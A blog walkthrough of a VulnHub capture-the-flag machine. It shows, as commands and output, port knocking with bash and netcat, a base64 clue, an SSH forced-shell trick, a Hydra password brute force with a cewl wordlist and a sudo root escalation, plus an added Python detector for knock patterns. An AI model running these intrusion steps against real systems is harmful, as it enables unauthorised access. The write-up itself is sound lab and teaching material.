<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><i><span style="color: blue;"> </span></i></span><br />
<br />
<span style="font-size: small;"><i><span style="color: blue;">Visiting the site with a browser gives:</span></i></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt7WuYHvXxIIF-H9sfBeYKIwPKhEWn73IZ9RT-rM3bALL6JTRWoCTha5rxvmF8A9KrVWXOGgRbGjPajHKmFvcQFVv4Wpw6LMNUJQV0QiOoWkmpb663gak1fa0fZapB_qE7bEDjFt7Q804/s1600/second+burgerworld+Screenshot+-+150415+-+22:49:35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt7WuYHvXxIIF-H9sfBeYKIwPKhEWn73IZ9RT-rM3bALL6JTRWoCTha5rxvmF8A9KrVWXOGgRbGjPajHKmFvcQFVv4Wpw6LMNUJQV0QiOoWkmpb663gak1fa0fZapB_qE7bEDjFt7Q804/s320/second+burgerworld+Screenshot+-+150415+-+22:49:35.png" height="122" width="400" /></a></span></div>
<span style="color: blue; font-size: small;"><span style="background-color: #eeeeee;"><i>The link gives another pcap file, pcap2.pcap.</i></span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT5sJPCcIXHC_nzPmGCZuAZ_Hlz4wqIiEmP0pBKQZYEczWsR8I-5xzG4HGAPSR7B1dLpdzEY454XDRtI5y50wSK07V_rKM_Blumqpy4DJx7exWwKkl02eqHE7puaPz7uzx3p-UWZMEkss/s1600/pcap2+Screenshot+-+150415+-+22:53:17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT5sJPCcIXHC_nzPmGCZuAZ_Hlz4wqIiEmP0pBKQZYEczWsR8I-5xzG4HGAPSR7B1dLpdzEY454XDRtI5y50wSK07V_rKM_Blumqpy4DJx7exWwKkl02eqHE7puaPz7uzx3p-UWZMEkss/s320/pcap2+Screenshot+-+150415+-+22:53:17.png" height="51" width="400" /> </a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i>Wireshark shows some more ICMP and ARP traffic.</i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i>However, more connections are established, to different ports.</i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i>Connections to TCP 21, UDP 22, TCP 80 and 8080, then a connection was estabished to http-alt (port 8080) and data went back and fourth.</i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZuy04tWE-3WnIca8vuQziCLYsyg107lnIlV1LzUbK941vofMoFvMv0p36j6qnZAd0yQTP8TfxH4ZjBCr1NQzWFJPfL5japUScESiKaN4ckU_GqOTcYb7faGryQJRAd5mNifhmugHWa5w/s1600/pcap2+stream+Screenshot+-+150415+-+23:00:03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZuy04tWE-3WnIca8vuQziCLYsyg107lnIlV1LzUbK941vofMoFvMv0p36j6qnZAd0yQTP8TfxH4ZjBCr1NQzWFJPfL5japUScESiKaN4ckU_GqOTcYb7faGryQJRAd5mNifhmugHWa5w/s320/pcap2+stream+Screenshot+-+150415+-+23:00:03.png" height="280" width="400" /> </a></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i>So I probed with another bash script to ports 1,3,3,7 to no avail.</i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i>I decided to go slightly more upmarket and use <a href="https://github.com/hack1thu7ch/knock-knock">knock-knock.</a></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i>After a bit of tweaking the script kicked in.</i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;">[-] Scanning 192.168.56.102 with Nmap, this could take a minute...go get some coffee<br /><br />[-] Sending default knockd sequence to 192.168.56.102<br /><br />[-] Scanning again...too soon for more coffee???<br /><br />[+] 1 new port(s) opened...<br />(1337, 'tcp')<br /><br />Writing to output file - outfile.txt<i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i>It showed port 1337 was now open.</i></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><i>nc -vv 192.168.56.102 1337<br />Connection to 192.168.56.102 1337 port [tcp/*] succeeded!<br />/iamcornholio/</i><span style="color: blue;"><i><br /></i></span></span><br />
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVgSoWBTLvmByPYEtt217W03xCw2zDWr1nE8pvdwwgP0feFV3KeVFA5_TvfenwPjDjYrOqXm65OwH9FGxuJI2t4UnKaQpqsn5WwKbOz6wRjfC0Nnx3gjstr2PTBQmWszhGHEDgjxS7fXY/s1600/cornholio+Screenshot+-+150415+-+23:13:48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVgSoWBTLvmByPYEtt217W03xCw2zDWr1nE8pvdwwgP0feFV3KeVFA5_TvfenwPjDjYrOqXm65OwH9FGxuJI2t4UnKaQpqsn5WwKbOz6wRjfC0Nnx3gjstr2PTBQmWszhGHEDgjxS7fXY/s320/cornholio+Screenshot+-+150415+-+23:13:48.png" height="61" width="400" /></a></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;">No pcap file this time; however, "all about that base" was a clue.</span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;"> <span style="color: black;">echo "T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK" > base64_encoded.txt<br /><br />base64 -d base64_encoded.txt <br />Open up SSH: 8888 9999 7777 6666</span></span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;">Another knocking sequence, so I returned to my bash script method.</span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i>#!/bin/bash<br /># knock4.sh: send the sequence from the decoded clue, then check whether SSH opened<br />HOST=192.168.56.102<br />for p in 8888 9999 7777 6666; do<br />    nc -v "$HOST" "$p"   # each knock is expected to be refused; only the order matters<br />done<br />nc -v "$HOST" 22         # if the knock worked, this one connects and shows the SSH banner</i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;"><span style="color: black;">./knock4.sh <br />nc: connect to 192.168.56.102 port 8888 (tcp) failed: Connection refused<br />nc: connect to 192.168.56.102 port 9999 (tcp) failed: Connection refused<br />nc: connect to 192.168.56.102 port 7777 (tcp) failed: Connection refused<br />nc: connect to 192.168.56.102 port 6666 (tcp) failed: Connection refused<br />Connection to 192.168.56.102 22 port [tcp/ssh] succeeded!<br />SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2</span></span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;">Port 22 is now open, nice one!</span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"> ############################################<br /># CONGRATS! YOU HAVE OPENED THE SSH SERVER #<br /># USERNAME: butthead #<br /># PASSWORD: nachosrule #<br />############################################</span></div>
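<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;">The knock-then-open pattern visible in the capture and in knock4.sh above is also what a defender can hunt for: a burst of refused probes from one source, followed by a successful connection from the same source. The following is an added example, not code from the original post or from the challenge; the firewall-style log format, the constructed SAMPLE_LOG lines and the function names are assumptions of this example.</span></div>

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines (not from the original capture): a firewall-style
# log of connection attempts against the box, in the shape of what the
# Wireshark view showed: refused knocks, then a successful connect to SSH.
SAMPLE_LOG = """\
2015-04-15T22:53:01 SRC=192.168.56.1 DST=192.168.56.102 PROTO=TCP DPT=8888 RESULT=REFUSED
2015-04-15T22:53:01 SRC=192.168.56.1 DST=192.168.56.102 PROTO=TCP DPT=9999 RESULT=REFUSED
2015-04-15T22:53:02 SRC=192.168.56.1 DST=192.168.56.102 PROTO=TCP DPT=7777 RESULT=REFUSED
2015-04-15T22:53:02 SRC=192.168.56.1 DST=192.168.56.102 PROTO=TCP DPT=6666 RESULT=REFUSED
2015-04-15T22:53:03 SRC=192.168.56.1 DST=192.168.56.102 PROTO=TCP DPT=22 RESULT=ESTABLISHED
2015-04-15T22:58:10 SRC=192.168.56.50 DST=192.168.56.102 PROTO=TCP DPT=80 RESULT=ESTABLISHED
2015-04-15T22:59:00 SRC=192.168.56.77 DST=192.168.56.102 PROTO=TCP DPT=443 RESULT=REFUSED
2015-04-15T22:59:40 SRC=192.168.56.77 DST=192.168.56.102 PROTO=TCP DPT=22 RESULT=ESTABLISHED
"""

# Assumed log format: ISO timestamp followed by key=value fields.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=(?P<proto>\S+) "
    r"DPT=(?P<dport>\d+) RESULT=(?P<result>REFUSED|ESTABLISHED)$"
)


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    rec["dport"] = int(rec["dport"])
    return rec


def find_knock_sequences(lines, window=timedelta(seconds=30), min_knocks=3):
    """Return alerts as (src, dst, [knocked ports in order], opened port).

    A source that sends at least `min_knocks` refused attempts to a host and
    then, within `window`, successfully connects to that host is flagged.
    """
    recent = defaultdict(list)  # (src, dst) -> refused records still inside the window
    alerts = []
    records = [r for r in (parse_line(l) for l in lines) if r]
    for rec in sorted(records, key=lambda r: r["ts"]):
        key = (rec["src"], rec["dst"])
        # Drop knocks that fell out of the window before this record.
        recent[key] = [r for r in recent[key] if rec["ts"] - r["ts"] <= window]
        if rec["result"] == "REFUSED":
            recent[key].append(rec)
            continue
        knocks = recent[key]
        if len(knocks) >= min_knocks:
            alerts.append((rec["src"], rec["dst"],
                           [f'{r["proto"].lower()}/{r["dport"]}' for r in knocks],
                           rec["dport"]))
            recent[key] = []  # one alert per burst
    return alerts


if __name__ == "__main__":
    for src, dst, knocks, opened in find_knock_sequences(SAMPLE_LOG.splitlines()):
        print(f"{src} -> {dst}: knocked {' '.join(knocks)}, then connected to port {opened}")
```

<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;">A plain port scan that happens to hit an open port leaves the same trace, so treat a hit as a lead to correlate with knockd logs or with a repeat of the same port order, not as proof.</span></div>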
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;">However, this was not to be as smooth as I initially thought...</span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;">butthead@192.168.56.102's password: <br />Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)<br /><br /> * Documentation: https://help.ubuntu.com/<br />Last login: Sun Apr 12 15:01:54 2015 from 192.168.56.1<br />You are only logging in for a split second! What do you do!<br />Connection to 192.168.56.102 closed.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><span style="color: blue;"><i>After a little digging in the ssh man pages, I stumbled across it.</i></span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;">NAME<br /> ssh — OpenSSH SSH client (remote login program)<br /><br />SYNOPSIS<br /> ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec] [-D [bind_address:]port]<br /> [-E log_file] [-e escape_char] [-F configfile] [-I pkcs11] [-i identity_file]<br /> [-L [bind_address:]port:host:hostport] [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option]<br /> [-p port] [-Q cipher | cipher-auth | mac | kex | key] [-R [bind_address:]port:host:hostport]<br /> [-S ctl_path] [-W host:port] [-w local_tun[:remote_tun]] [user@]hostname [command]<br /><br />ssh -l butthead 192.168.56.102 /bin/bash<br />butthead@192.168.56.102's password: </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;"><br /></span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;"><br /></span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;"><br /></span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;">After a few seconds of waiting and thinking, I gave the "ls" command.</span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;"><br /></span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;"><br /></span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;"><br /></span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;"><br /></span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;">ls<br />files.txt<br />nachos<br />id<br />uid=1001(butthead) gid=1001(butthead) groups=1001(butthead)<br />cat nachos<br />Great job on getting this far.<br /><br />Can you login as beavis or root ?</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i>This was another hint...</i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;">cat /etc/passwd | grep beavis<br />beavis:x:1000:1000:beavis,,,:/home/beavis:/bin/bash</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i>I took a while looking through the home folder of "beavis" and not finding much, I decided to set hydra loose on the ssh service.</i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i> After no luck using conventional wordlists I used <a href="https://digi.ninja/projects/cewl.php" target="_blank">cewl</a> to generate my own from a wikipedia page on <a href="https://en.wikipedia.org/wiki/Beavis_and_Butt-head" target="_blank">Beavis and Butthead</a></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><span style="color: black;">[DATA] attacking service ssh on port 22<br />[ERROR] ssh protocol error<br />[ERROR] ssh protocol error<br />---snip-----<br />[ERROR] ssh protocol error<br />[22][ssh] host: 192.168.56.101 login: beavis password: mikejudge<br />1 of 1 target successfully completed, 1 valid password found<br />Hydra (http://www.thc.org/thc-hydra) finished at 2015-04-12 22:08:18</span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i> Hydra had found a valid password for the user "beavis"</i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i><br />Logging in....</i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i>beavis@192.168.56.102's password: <br />Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)<br /><br /> * Documentation: https://help.ubuntu.com/<br />Last login: Sun Apr 12 17:07:32 2015 from 192.168.56.1<br />beavis@Huhuhhhhhuhuhhh:~</i>$ </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><span style="color: blue;"><i>It was starting to go very well, time to start looking for ways to obtain root...</i></span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;">beavis@Huhuhhhhhuhuhhh:~$ id<br />uid=1000(beavis) gid=1000(beavis) groups=1000(beavis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)<br /> </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;">beavis@Huhuhhhhhuhuhhh:~$ sudo -l<br />[sudo] password for beavis: </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br />Matching Defaults entries for beavis on Huhuhhhhhuhuhhh:<br /> env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin<br /><br />User beavis may run the following commands on Huhuhhhhhuhuhhh:<br /> (ALL : ALL) ALL<br />beavis@Huhuhhhhhuhuhhh:~$</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;">A quick check of id shows beavis is in group 27(sudo), and sudo -l confirms it can run commands as (ALL : ALL) ALL.</span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;">beavis@Huhuhhhhhuhuhhh:~$ sudo bash<br />root@Huhuhhhhhuhuhhh:~# id<br />uid=0(root) gid=0(root) groups=0(root)<br />root@Huhuhhhhhuhuhhh:~# cd /root<br />root@Huhuhhhhhuhuhhh:/root# ls<br />SECRETZ<br />root@Huhuhhhhhuhuhhh:/root# more SECRETZ <br />You have done a great job, if you can see this, please shoot me an email<br />and let me know that you have beat this box!<br /><br />SECRET = "LIVE LONG AND PROSPER, REST IN PEACE MR. SPOCK"<br /><br />admin@top-hat-sec.com<br /><br /><br />root@Huhuhhhhhuhuhhh:/root# </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><u><b>Fin</b></u>:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><span style="color: blue;"><i>Thanks to everyone at Vulnhub for the guidance over the time I've been there.</i></span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><span style="color: blue;"><i>Special thanks to Tophatsec for creating this challenge.</i></span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>